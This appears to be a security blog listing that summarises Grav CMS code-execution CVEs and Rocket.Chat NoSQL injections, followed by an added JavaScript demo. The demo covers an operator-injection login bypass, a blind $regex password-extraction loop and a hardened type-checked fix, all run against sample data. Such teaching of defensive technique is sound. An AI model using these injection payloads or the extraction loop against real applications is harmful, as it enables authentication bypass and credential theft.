Code Execution vulnerabilities in Grav CMS 1.7.10 (CVE-2021-29439, CVE-2021-29440)
Like other recent flat-file PHP CMSs, Grav CMS is a modern web platform for building fast, secure and extensible websites. It is built on a current technology stack (Twig, Symfony and Doctrine) and ships with an administration dashboard for managing the whole site (structure, pages, static resources, etc.). It was voted "Best Flat File CMS" in 2017 and 2019 and is rapidly gaining traction, with over 12k GitHub stars.
Since simplicity and security are often the key arguments for choosing a flat-file CMS, we recently carried out security research on Grav 1.7.10 and found two interesting vulnerabilities, one in the core and one in the dashboard (CVE-2021-29440 and CVE-2021-29439 respectively). Both can be exploited by authenticated attackers with low privileges, and allow them to execute arbitrary code and commands on the underlying server.
We responsibly reported the following security-relevant bugs to the vendor, who quickly released version 1.7.11 to address them:
Improper authorization checks that can allow a low-privileged authenticated user to install arbitrary plugins;
A dangerous configuration of the Twig templating engine that can lead to the execution of PHP code, exploitable by users allowed to create or edit pages on the instance.
In this post, we discuss the root cause of these two bugs, how attackers can exploit them to gain code execution, and how the vulnerable code was patched.
NoSQL Injections in Rocket.Chat 3.12.1 (CVE-2021-22911)
In this blog post we investigate these vulnerabilities, first taking a quick look at NoSQL databases and then explaining what injections look like in that context. We then analyze the vulnerabilities we found and how they can be chained into an exploit. Finally, we give advice on how to prevent such bugs in your own applications.
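The operator-injection pattern that NoSQL injections in a MongoDB-backed application usually take, as an added example that is not code from the original post or from Rocket.Chat: a small in-memory matcher implementing a subset of MongoDB query semantics (the `$eq`, `$ne`, `$gt`, `$lt`, `$in` and `$regex` operators, assumed to be enough for the demonstration), a login lookup that passes request JSON straight into the query, its hardened counterpart, and the blind `$regex` extraction that a chained attack would use once one injectable field is found. The user records, the request bodies and the alphabet are constructed sample data.

```javascript
// Added example, not from the original post or the Rocket.Chat code base.
// Constructed sample "collection": what a login lookup would query.
const users = [
  { _id: 1, username: "admin", password: "s3cret-hunter2", role: "admin" },
  { _id: 2, username: "alice", password: "correct-horse", role: "user" },
];

// Subset of MongoDB query semantics (assumed sufficient for the demo):
// a plain value is an equality match; an object whose keys all start
// with "$" is an operator expression evaluated against the stored value.
function matchesField(actual, expected) {
  if (expected !== null && typeof expected === "object" && !Array.isArray(expected)) {
    const keys = Object.keys(expected);
    if (keys.length > 0 && keys.every((k) => k.startsWith("$"))) {
      return keys.every((op) => {
        const arg = expected[op];
        switch (op) {
          case "$eq": return actual === arg;
          case "$ne": return actual !== arg;
          case "$gt": return actual > arg;
          case "$lt": return actual < arg;
          case "$in": return Array.isArray(arg) && arg.includes(actual);
          case "$regex": return typeof actual === "string" && new RegExp(arg).test(actual);
          default: throw new Error(`unsupported operator ${op}`);
        }
      });
    }
  }
  return actual === expected;
}

// Returns the first document for which every query field matches, or null.
function findOne(collection, query) {
  return collection.find((doc) =>
    Object.keys(query).every((field) => matchesField(doc[field], query[field]))) || null;
}

// Vulnerable login: the body comes from parsed JSON, so `username` and
// `password` may be objects rather than strings. {"$ne": ""} as a password
// turns "password equals X" into "password is anything but empty".
function loginVulnerable(body) {
  return findOne(users, { username: body.username, password: body.password });
}

// Hardened login: enforce the expected type before the value reaches the
// query, so an operator object can never be interpreted as one.
function assertPlainString(value, name) {
  if (typeof value !== "string") throw new TypeError(`${name} must be a string`);
  return value;
}

function loginHardened(body) {
  const username = assertPlainString(body.username, "username");
  const password = assertPlainString(body.password, "password");
  return findOne(users, { username, password });
}

// Blind extraction: with one injectable field, each request answers a single
// yes/no question ("does the stored password start with <prefix>?"), which is
// enough to recover the value character by character.
function escapeRegex(s) {
  return s.replace(/[.*+?^${}()|[\]\\-]/g, "\\$&");
}

const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-".split("");

function recoverPasswordPrefix(username, alphabet, maxLen) {
  let prefix = "";
  for (let i = 0; i < maxLen; i++) {
    const next = alphabet.find((ch) =>
      loginVulnerable({ username, password: { $regex: "^" + escapeRegex(prefix + ch) } }) !== null);
    if (next === undefined) break; // no extension matches: the full value is known
    prefix += next;
  }
  return prefix;
}
```

The type check is the fix that generalizes: validating the shape of every value that reaches a query (a string where a string is expected, a number where a number is expected) removes the operator interpretation entirely, whereas stripping `$`-prefixed keys has to be applied recursively and is easy to forget on one code path. The `recoverPasswordPrefix` loop is the reason a "mere" authentication bypass in one endpoint is chained further in practice: the same injection point leaks whatever field the query compares against.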